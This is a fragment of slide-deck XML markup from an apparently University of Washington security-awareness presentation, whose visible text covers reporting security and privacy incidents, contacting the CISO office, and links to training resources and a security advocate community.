          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Drupal titles are older, but may have pertinent info</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="100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1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="449800" y="2075900"/>
            <a:ext cx="8395800" cy="1192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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Encode Sans"/>
                <a:ea typeface="Encode Sans"/>
                <a:cs typeface="Encode Sans"/>
                <a:sym typeface="Encode Sans"/>
              </a:rPr>
              <a:t>Something has gone wrong. Now what?</a:t>
            </a:r>
            <a:endParaRPr sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Encode Sans"/>
              <a:ea typeface="Encode Sans"/>
              <a:cs typeface="Encode Sans"/>
              <a:sym typeface="Encode Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="241" name="Google Shape;241;p41">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528325" y="2750100"/>
            <a:ext cx="1714500" cy="857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Reporting Incidents</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="247" name="Google Shape;247;p42"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1109100"/>
            <a:ext cx="8520600" cy="3959700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Review “Report an Incident” pages</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-355600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Review *before* a suspected incident occurs</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-355600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>See </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://ciso.uw.edu/report/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://privacy.uw.edu/report/</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-355600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Determine if UW Confidential or Restricted data are involved</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-355600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>If yes, fill out the form on this page: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://privacy.uw.edu/report/</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-355600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Contact </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>ciso@uw.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t> if you need help determining impact of the incident</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-336550" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>APS 2.5: https://www.washington.edu/admin/rules/policies/APS/02.05.html</a:t>
            </a:r>
            <a:endParaRPr sz="1700">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7">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="100"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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7">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="100"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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7">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="100"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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7">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="100"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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7">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="100"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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7">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="100"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24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7">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="100"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426700" y="2054200"/>
            <a:ext cx="8395800" cy="73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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Encode Sans"/>
                <a:ea typeface="Encode Sans"/>
                <a:cs typeface="Encode Sans"/>
                <a:sym typeface="Encode Sans"/>
              </a:rPr>
              <a:t>Resources</a:t>
            </a:r>
            <a:endParaRPr sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Encode Sans"/>
              <a:ea typeface="Encode Sans"/>
              <a:cs typeface="Encode Sans"/>
              <a:sym typeface="Encode Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="253" name="Google Shape;253;p43">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528325" y="2750100"/>
            <a:ext cx="1714500" cy="857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Check out CISO training resources</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="259" name="Google Shape;259;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="387900" y="1220350"/>
            <a:ext cx="8520600" cy="837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500"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>The Office of the CISO has produced and accumulated materials to educate you on cybersecurity. They’re both awesome and free!</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="4B2E83"/>
              </a:solidFill>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="260" name="Google Shape;260;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1919750"/>
            <a:ext cx="8520600" cy="29496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4B2E83"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Online training: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1800" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://ciso.uw.edu/education/online-training/</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="4B2E83"/>
              </a:solidFill>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B2E83"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Risk Advisories and Best Practices:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1800" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://ciso.uw.edu/education/risk-advisories/</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="4B2E83"/>
              </a:solidFill>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B2E83"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Infographics:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1800" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://ciso.uw.edu/education/infographics/</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="4B2E83"/>
              </a:solidFill>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>And much, much more.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="4B2E83"/>
              </a:solidFill>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="150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animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="200"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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0">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="200"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26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0">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="200"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26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0">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="200"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26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0">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="200"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26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Become a security advocate (2 of 2)</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="266" name="Google Shape;266;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="387900" y="1220350"/>
            <a:ext cx="8520600" cy="837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500"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>A Community of Practice for people with an interest in learning about and promoting a culture of cybersecurity throughout the UW</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="4B2E83"/>
              </a:solidFill>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="267" name="Google Shape;267;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1919750"/>
            <a:ext cx="8520600" cy="29496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4B2E83"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Work with the Office of the CISO to develop and promote best practices and awareness</a:t>
            </a:r>
            <a:endParaRPr sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4B2E83"/>
              </a:solidFill>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B2E83"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Build relationships, exchange information, collaborate, share expertise, and help us all reduce risk</a:t>
            </a:r>
            <a:endParaRPr sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4B2E83"/>
              </a:solidFill>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
